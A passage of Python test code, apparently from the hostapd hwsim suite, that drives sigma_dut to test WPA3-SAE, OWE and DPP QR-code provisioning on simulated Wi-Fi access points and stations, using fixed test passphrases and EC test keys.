sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-SAE,PSK,12345678")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].request("SET sae_groups ")
id = dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
ieee80211w="2", scan_freq="2412")
if dev[0].get_status_field('sae_group') != '19':
raise Exception("Expected default SAE group not used")
res = sigma_dut_cmd_check("ap_get_parameter,name,AP,STA_MAC_Address,%s,Parameter,PMK" % dev[0].own_addr())
logger.info("Reported PMK: " + res)
if ",PMK," not in res:
raise Exception("PMK not reported");
if dev[0].get_pmk(id) != res.split(',')[3]:
raise Exception("Mismatch in reported PMK")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_sae_confirm_immediate(dev, apdev, params):
"""sigma_dut controlled AP with SAE Confirm immediate"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_sae_confirm_immediate.sigma-hostapd")
check_sae_capab(dev[0])
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-SAE,PSK,12345678,SAE_Confirm_Immediate,enable")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].request("SET sae_groups ")
dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
ieee80211w="2", scan_freq="2412")
if dev[0].get_status_field('sae_group') != '19':
raise Exception("Expected default SAE group not used")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_sae_password(dev, apdev, params):
"""sigma_dut controlled AP with SAE and long password"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_sae_password.sigma-hostapd")
check_sae_capab(dev[0])
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-SAE,PSK," + 100*'C')
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].request("SET sae_groups ")
dev[0].connect("test-sae", key_mgmt="SAE", sae_password=100*'C',
ieee80211w="2", scan_freq="2412")
if dev[0].get_status_field('sae_group') != '19':
raise Exception("Expected default SAE group not used")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_sae_pw_id(dev, apdev, params):
"""sigma_dut controlled AP with SAE Password Identifier"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_sae_pw_id.sigma-hostapd")
conffile = os.path.join(params['logdir'],
"sigma_dut_ap_sae_pw_id.sigma-conf")
check_sae_capab(dev[0])
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,AKMSuiteType,8,SAEPasswords,pw1:id1;pw2:id2;pw3;pw4:id4,PMF,Required")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
with open("/tmp/sigma_dut-ap.conf", "rb") as f:
with open(conffile, "wb") as f2:
f2.write(f.read())
dev[0].request("SET sae_groups ")
tests = [("pw1", "id1"),
("pw2", "id2"),
("pw3", None),
("pw4", "id4")]
for pw, pw_id in tests:
dev[0].connect("test-sae", key_mgmt="SAE", sae_password=pw,
sae_password_id=pw_id,
ieee80211w="2", scan_freq="2412")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_sae_pw_id_pwe_loop(dev, apdev, params):
"""sigma_dut controlled AP with SAE Password Identifier and forced PWE looping"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_sae_pw_id_pwe_loop.sigma-hostapd")
conffile = os.path.join(params['logdir'],
"sigma_dut_ap_sae_pw_id_pwe_loop.sigma-conf")
check_sae_capab(dev[0])
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,AKMSuiteType,8,SAEPasswords,12345678:pwid,PMF,Required,sae_pwe,looping")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
with open("/tmp/sigma_dut-ap.conf", "rb") as f:
with open(conffile, "wb") as f2:
f2.write(f.read())
dev[0].set("sae_groups", "")
dev[0].connect("test-sae", key_mgmt="SAE", sae_password="12345678",
sae_password_id="pwid",
ieee80211w="2", scan_freq="2412", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-NETWORK-NOT-FOUND",
"CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Network selection result not indicated")
if "CTRL-EVENT-CONNECTED" in ev:
raise Exception("Unexpected connection")
dev[0].request("REMOVE_NETWORK all")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_sae_pw_id_ft(dev, apdev, params):
"""sigma_dut controlled AP with SAE Password Identifier and FT"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_sae_pw_id_ft.sigma-hostapd")
conffile = os.path.join(params['logdir'],
"sigma_dut_ap_sae_pw_id_ft.sigma-conf")
check_sae_capab(dev[0])
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng,DOMAIN,aabb")
sigma_dut_cmd_check("ap_set_security,NAME,AP,AKMSuiteType,8;9,SAEPasswords,pw1:id1;pw2:id2;pw3;pw4:id4,PMF,Required")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
with open("/tmp/sigma_dut-ap.conf", "rb") as f:
with open(conffile, "wb") as f2:
f2.write(f.read())
dev[0].request("SET sae_groups ")
tests = [("pw1", "id1", "SAE"),
("pw2", "id2", "FT-SAE"),
("pw3", None, "FT-SAE"),
("pw4", "id4", "SAE")]
for pw, pw_id, key_mgmt in tests:
dev[0].connect("test-sae", key_mgmt=key_mgmt, sae_password=pw,
sae_password_id=pw_id,
ieee80211w="2", scan_freq="2412")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_sae_group(dev, apdev, params):
"""sigma_dut controlled AP with SAE and specific group"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_sae_group.sigma-hostapd")
check_sae_capab(dev[0])
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-SAE,PSK,12345678,ECGroupID,20")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].request("SET sae_groups ")
dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
ieee80211w="2", scan_freq="2412")
if dev[0].get_status_field('sae_group') != '20':
raise Exception("Expected SAE group not used")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_psk_sae(dev, apdev, params):
"""sigma_dut controlled AP with PSK+SAE"""
check_sae_capab(dev[0])
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_psk_sae.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-PSK-SAE,PSK,12345678")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[2].request("SET sae_groups ")
dev[2].connect("test-sae", key_mgmt="SAE", psk="12345678",
scan_freq="2412", ieee80211w="0", wait_connect=False)
dev[0].request("SET sae_groups ")
dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
scan_freq="2412", ieee80211w="2")
dev[1].connect("test-sae", psk="12345678", scan_freq="2412")
ev = dev[2].wait_event(["CTRL-EVENT-CONNECTED"], timeout=0.1)
dev[2].request("DISCONNECT")
if ev is not None:
raise Exception("Unexpected connection without PMF")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_psk_sae_ft(dev, apdev, params):
"""sigma_dut controlled AP with PSK, SAE, FT"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_psk_sae_ft.sigma-hostapd")
conffile = os.path.join(params['logdir'],
"sigma_dut_ap_psk_sae_ft.sigma-conf")
check_sae_capab(dev[0])
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default,NAME,AP,Program,WPA3")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae-psk,MODE,11ng,DOMAIN,aabb")
sigma_dut_cmd_check("ap_set_security,NAME,AP,AKMSuiteType,2;4;6;8;9,PSK,12345678,PairwiseCipher,AES-CCMP-128,GroupCipher,AES-CCMP-128")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,DOMAIN,0101,FT_OA,Enable")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,FT_BSS_LIST," + apdev[1]['bssid'])
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
with open("/tmp/sigma_dut-ap.conf", "rb") as f:
with open(conffile, "wb") as f2:
f2.write(f.read())
dev[0].request("SET sae_groups ")
dev[0].connect("test-sae-psk", key_mgmt="SAE FT-SAE",
sae_password="12345678", scan_freq="2412")
dev[1].connect("test-sae-psk", key_mgmt="WPA-PSK FT-PSK",
psk="12345678", scan_freq="2412")
dev[2].connect("test-sae-psk", key_mgmt="WPA-PSK",
psk="12345678", scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_owe(dev, apdev):
"""sigma_dut controlled OWE station"""
if "OWE" not in dev[0].get_capability("key_mgmt"):
raise HwsimSkip("OWE not supported")
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
params = {"ssid": "owe",
"wpa": "2",
"wpa_key_mgmt": "OWE",
"ieee80211w": "2",
"rsn_pairwise": "CCMP"}
hapd = hostapd.add_ap(apdev[0], params)
bssid = hapd.own_addr()
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,owe,Type,OWE" % ifname)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,owe,channel,1" % ifname,
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
res = sigma_dut_cmd_check("sta_get_parameter,interface,%s,Parameter,PMK" % ifname)
logger.info("Reported PMK: " + res)
if ",PMK," not in res:
raise Exception("PMK not reported");
if hapd.request("GET_PMK " + dev[0].own_addr()) != res.split(',')[3]:
raise Exception("Mismatch in reported PMK")
dev[0].dump_monitor()
sigma_dut_cmd("sta_reassoc,interface,%s,Channel,1,bssid,%s" % (ifname, bssid))
dev[0].wait_connected()
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
dev[0].wait_disconnected()
dev[0].dump_monitor()
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,owe,Type,OWE,ECGroupID,20" % ifname)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,owe,channel,1" % ifname,
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
dev[0].wait_disconnected()
dev[0].dump_monitor()
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,owe,Type,OWE,ECGroupID,0" % ifname)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,owe,channel,1" % ifname,
timeout=10)
ev = dev[0].wait_event(["CTRL-EVENT-ASSOC-REJECT"], timeout=10)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
if ev is None:
raise Exception("Association not rejected")
if "status_code=77" not in ev:
raise Exception("Unexpected rejection reason: " + ev)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_owe_ptk_workaround(dev, apdev):
"""sigma_dut controlled OWE station with PTK workaround"""
if "OWE" not in dev[0].get_capability("key_mgmt"):
raise HwsimSkip("OWE not supported")
params = {"ssid": "owe",
"wpa": "2",
"wpa_key_mgmt": "OWE",
"owe_ptk_workaround": "1",
"owe_groups": "20",
"ieee80211w": "2",
"rsn_pairwise": "CCMP"}
hapd = hostapd.add_ap(apdev[0], params)
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname, owe_ptk_workaround=True)
try:
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,owe,Type,OWE,ECGroupID,20" % ifname)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,owe,channel,1" % ifname,
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_owe(dev, apdev, params):
"""sigma_dut controlled AP with OWE"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_owe.sigma-hostapd")
if "OWE" not in dev[0].get_capability("key_mgmt"):
raise HwsimSkip("OWE not supported")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default,NAME,AP,Program,WPA3")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,owe,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,OWE")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
id = dev[0].connect("owe", key_mgmt="OWE", ieee80211w="2",
scan_freq="2412")
res = sigma_dut_cmd_check("ap_get_parameter,name,AP,STA_MAC_Address,%s,Parameter,PMK" % dev[0].own_addr())
logger.info("Reported PMK: " + res)
if ",PMK," not in res:
raise Exception("PMK not reported");
if dev[0].get_pmk(id) != res.split(',')[3]:
raise Exception("Mismatch in reported PMK")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_owe_ecgroupid(dev, apdev):
"""sigma_dut controlled AP with OWE and ECGroupID"""
if "OWE" not in dev[0].get_capability("key_mgmt"):
raise HwsimSkip("OWE not supported")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface)
try:
sigma_dut_cmd_check("ap_reset_default,NAME,AP,Program,WPA3")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,owe,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,OWE,ECGroupID,20 21,PMF,Required")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("owe", key_mgmt="OWE", ieee80211w="2",
owe_group="20", scan_freq="2412")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].connect("owe", key_mgmt="OWE", ieee80211w="2",
owe_group="21", scan_freq="2412")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].connect("owe", key_mgmt="OWE", ieee80211w="2",
owe_group="19", scan_freq="2412", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-ASSOC-REJECT"], timeout=10)
dev[0].request("DISCONNECT")
if ev is None:
raise Exception("Association not rejected")
if "status_code=77" not in ev:
raise Exception("Unexpected rejection reason: " + ev)
dev[0].dump_monitor()
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_owe_ptk_workaround(dev, apdev):
"""sigma_dut controlled AP with OWE PTK workaround"""
if "OWE" not in dev[0].get_capability("key_mgmt"):
raise HwsimSkip("OWE not supported")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, owe_ptk_workaround=True)
try:
sigma_dut_cmd_check("ap_reset_default,NAME,AP,Program,WPA3")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,owe,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,OWE,ECGroupID,20,PMF,Required")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("owe", key_mgmt="OWE", ieee80211w="2",
owe_group="20", owe_ptk_workaround="1",
scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_owe_transition_mode(dev, apdev, params):
"""sigma_dut controlled AP with OWE and transition mode"""
if "OWE" not in dev[0].get_capability("key_mgmt"):
raise HwsimSkip("OWE not supported")
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_owe_transition_mode.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default,NAME,AP,Program,WPA3")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,WLAN_TAG,1,CHANNEL,1,SSID,owe,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,WLAN_TAG,1,KEYMGNT,OWE")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,WLAN_TAG,2,CHANNEL,1,SSID,owe,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,WLAN_TAG,2,KEYMGNT,NONE")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
res1 = sigma_dut_cmd_check("ap_get_mac_address,NAME,AP,WLAN_TAG,1,Interface,24G")
res2 = sigma_dut_cmd_check("ap_get_mac_address,NAME,AP,WLAN_TAG,2,Interface,24G")
dev[0].connect("owe", key_mgmt="OWE", ieee80211w="2",
scan_freq="2412")
dev[1].connect("owe", key_mgmt="NONE", scan_freq="2412")
if dev[0].get_status_field('bssid') not in res1:
raise Exception("Unexpected ap_get_mac_address WLAN_TAG,1: " + res1)
if dev[1].get_status_field('bssid') not in res2:
raise Exception("Unexpected ap_get_mac_address WLAN_TAG,2: " + res2)
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_owe_transition_mode_2(dev, apdev, params):
"""sigma_dut controlled AP with OWE and transition mode (2)"""
if "OWE" not in dev[0].get_capability("key_mgmt"):
raise HwsimSkip("OWE not supported")
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_owe_transition_mode_2.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default,NAME,AP,Program,WPA3")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,WLAN_TAG,1,CHANNEL,1,SSID,owe,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,WLAN_TAG,1,KEYMGNT,NONE")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,WLAN_TAG,2,CHANNEL,1,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,WLAN_TAG,2,KEYMGNT,OWE")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
res1 = sigma_dut_cmd_check("ap_get_mac_address,NAME,AP,WLAN_TAG,1,Interface,24G")
res2 = sigma_dut_cmd_check("ap_get_mac_address,NAME,AP,WLAN_TAG,2,Interface,24G")
dev[0].connect("owe", key_mgmt="OWE", ieee80211w="2",
scan_freq="2412")
dev[1].connect("owe", key_mgmt="NONE", scan_freq="2412")
if dev[0].get_status_field('bssid') not in res2:
raise Exception("Unexpected ap_get_mac_address WLAN_TAG,2: " + res1)
if dev[1].get_status_field('bssid') not in res1:
raise Exception("Unexpected ap_get_mac_address WLAN_TAG,1: " + res2)
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def dpp_init_enrollee(dev, id1, enrollee_role):
logger.info("Starting DPP initiator/enrollee in a thread")
time.sleep(1)
cmd = "DPP_AUTH_INIT peer=%d role=enrollee" % id1
if enrollee_role == "Configurator":
cmd += " netrole=configurator"
if "OK" not in dev.request(cmd):
raise Exception("Failed to initiate DPP Authentication")
ev = dev.wait_event(["DPP-CONF-RECEIVED"], timeout=5)
if ev is None:
raise Exception("DPP configuration not completed (Enrollee)")
logger.info("DPP initiator/enrollee done")
def test_sigma_dut_dpp_qr_resp_1(dev, apdev):
"""sigma_dut DPP/QR responder (conf index 1)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 1)
def test_sigma_dut_dpp_qr_resp_2(dev, apdev):
"""sigma_dut DPP/QR responder (conf index 2)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 2)
def test_sigma_dut_dpp_qr_resp_3(dev, apdev):
"""sigma_dut DPP/QR responder (conf index 3)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 3)
def test_sigma_dut_dpp_qr_resp_4(dev, apdev):
"""sigma_dut DPP/QR responder (conf index 4)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 4)
def test_sigma_dut_dpp_qr_resp_5(dev, apdev):
"""sigma_dut DPP/QR responder (conf index 5)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 5)
def test_sigma_dut_dpp_qr_resp_6(dev, apdev):
"""sigma_dut DPP/QR responder (conf index 6)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 6)
def test_sigma_dut_dpp_qr_resp_7(dev, apdev):
"""sigma_dut DPP/QR responder (conf index 7)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 7)
def test_sigma_dut_dpp_qr_resp_8(dev, apdev):
"""sigma_dut DPP/QR responder (conf index 8)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 8)
def test_sigma_dut_dpp_qr_resp_9(dev, apdev):
"""sigma_dut DPP/QR responder (conf index 9)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 9)
def test_sigma_dut_dpp_qr_resp_10(dev, apdev):
"""sigma_dut DPP/QR responder (conf index 10)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 10)
def test_sigma_dut_dpp_qr_resp_11(dev, apdev, params):
"""sigma_dut DPP/QR responder (conf index 11)"""
if not os.path.exists("./dpp-ca.py"):
raise HwsimSkip("dpp-ca.py not available")
logdir = params['logdir']
with open("auth_serv/ec-ca.pem", "rb") as f:
res = f.read()
with open(os.path.join(logdir, "dpp-ca.pem"), "wb") as f:
f.write(res)
with open("auth_serv/ec-ca.key", "rb") as f:
res = f.read()
with open(os.path.join(logdir, "dpp-ca.key"), "wb") as f:
f.write(res)
with open(os.path.join(logdir, "dpp-ca-csrattrs"), "wb") as f:
f.write(b'MAsGCSqGSIb3DQEJBw==')
run_sigma_dut_dpp_qr_resp(dev, apdev, 11, cert_path=logdir)
def test_sigma_dut_dpp_qr_resp_curve_change(dev, apdev):
"""sigma_dut DPP/QR responder (curve change)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 1, net_access_key_curve="P-384")
def test_sigma_dut_dpp_qr_resp_chan_list(dev, apdev):
"""sigma_dut DPP/QR responder (channel list override)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 1, chan_list='81/2 81/6 81/1',
listen_chan=2)
def test_sigma_dut_dpp_qr_resp_status_query(dev, apdev):
"""sigma_dut DPP/QR responder status query"""
check_dpp_capab(dev[1])
params = hostapd.wpa2_params(ssid="DPPNET01",
passphrase="ThisIsDppPassphrase")
hapd = hostapd.add_ap(apdev[0], params)
try:
dev[1].set("dpp_config_processing", "2")
run_sigma_dut_dpp_qr_resp(dev, apdev, 3, status_query=True)
finally:
dev[1].set("dpp_config_processing", "0", allow_fail=True)
def test_sigma_dut_dpp_qr_resp_configurator(dev, apdev):
"""sigma_dut DPP/QR responder (configurator provisioning)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, -1, enrollee_role="Configurator")
def run_sigma_dut_dpp_qr_resp(dev, apdev, conf_idx, chan_list=None,
listen_chan=None, status_query=False,
enrollee_role="STA", cert_path=None,
net_access_key_curve=None):
min_ver = 3 if net_access_key_curve else 1
check_dpp_capab(dev[0], min_ver=min_ver)
check_dpp_capab(dev[1], min_ver=min_ver)
sigma = start_sigma_dut(dev[0].ifname, cert_path=cert_path)
try:
cmd = "dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR"
if chan_list:
cmd += ",DPPChannelList," + chan_list
res = sigma_dut_cmd(cmd)
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
hex = res.split(',')[3]
uri = from_hex(hex)
logger.info("URI from sigma_dut: " + uri)
id1 = dev[1].dpp_qr_code(uri)
t = threading.Thread(target=dpp_init_enrollee, args=(dev[1], id1,
enrollee_role))
t.start()
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfEnrolleeRole,%s,DPPSigningKeyECC,P-256,DPPBS,QR,DPPTimeout,6" % enrollee_role
if conf_idx is not None:
cmd += ",DPPConfIndex,%d" % conf_idx
if listen_chan:
cmd += ",DPPListenChannel," + str(listen_chan)
if status_query:
cmd += ",DPPStatusQuery,Yes"
if net_access_key_curve:
cmd += ",DPPNAKECC," + net_access_key_curve
res = sigma_dut_cmd(cmd, timeout=10)
t.join()
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
if status_query and "StatusResult,0" not in res:
raise Exception("Status query did not succeed: " + res)
finally:
stop_sigma_dut(sigma)
csign = "30770201010420768240a3fc89d6662d9782f120527fe7fb9edc6366ab0b9c7dde96125cfd250fa00a06082a8648ce3d030107a144034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708"
csign_pub = "3059301306072a8648ce3d020106082a8648ce3d030107034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708"
ap_connector = "eyJ0eXAiOiJkcHBDb24iLCJraWQiOiJwYWtZbXVzd1dCdWpSYTl5OEsweDViaTVrT3VNT3dzZHRlaml2UG55ZHZzIiwiYWxnIjoiRVMyNTYifQ.eyJncm91cHMiOlt7Imdyb3VwSWQiOiIqIiwibmV0Um9sZSI6ImFwIn1dLCJuZXRBY2Nlc3NLZXkiOnsia3R5IjoiRUMiLCJjcnYiOiJQLTI1NiIsIngiOiIybU5vNXZuRkI5bEw3d1VWb1hJbGVPYzBNSEE1QXZKbnpwZXZULVVTYzVNIiwieSI6IlhzS3dqVHJlLTg5WWdpU3pKaG9CN1haeUttTU05OTl3V2ZaSVl0bi01Q3MifX0.XhjFpZgcSa7G2lHy0OCYTvaZFRo5Hyx6b7g7oYyusLC7C_73AJ4_BxEZQVYJXAtDuGvb3dXSkHEKxREP9Q6Qeg"
ap_netaccesskey = "30770201010420ceba752db2ad5200fa7bc565b9c05c69b7eb006751b0b329b0279de1c19ca67ca00a06082a8648ce3d030107a14403420004da6368e6f9c507d94bef0515a1722578e73430703902f267ce97af4fe51273935ec2b08d3adefbcf588224b3261a01ed76722a630cf7df7059f64862d9fee42b"
def start_dpp_ap(apdev):
params = {"ssid": "DPPNET01",
"wpa": "2",
"ieee80211w": "2",
"wpa_key_mgmt": "DPP",
"rsn_pairwise": "CCMP",
"dpp_connector": ap_connector,
"dpp_csign": csign_pub,
"dpp_netaccesskey": ap_netaccesskey}
try:
hapd = hostapd.add_ap(apdev, params)
except:
raise HwsimSkip("DPP not supported")
return hapd
def test_sigma_dut_dpp_qr_init_enrollee(dev, apdev):
"""sigma_dut DPP/QR initiator as Enrollee"""
check_dpp_capab(dev[0])
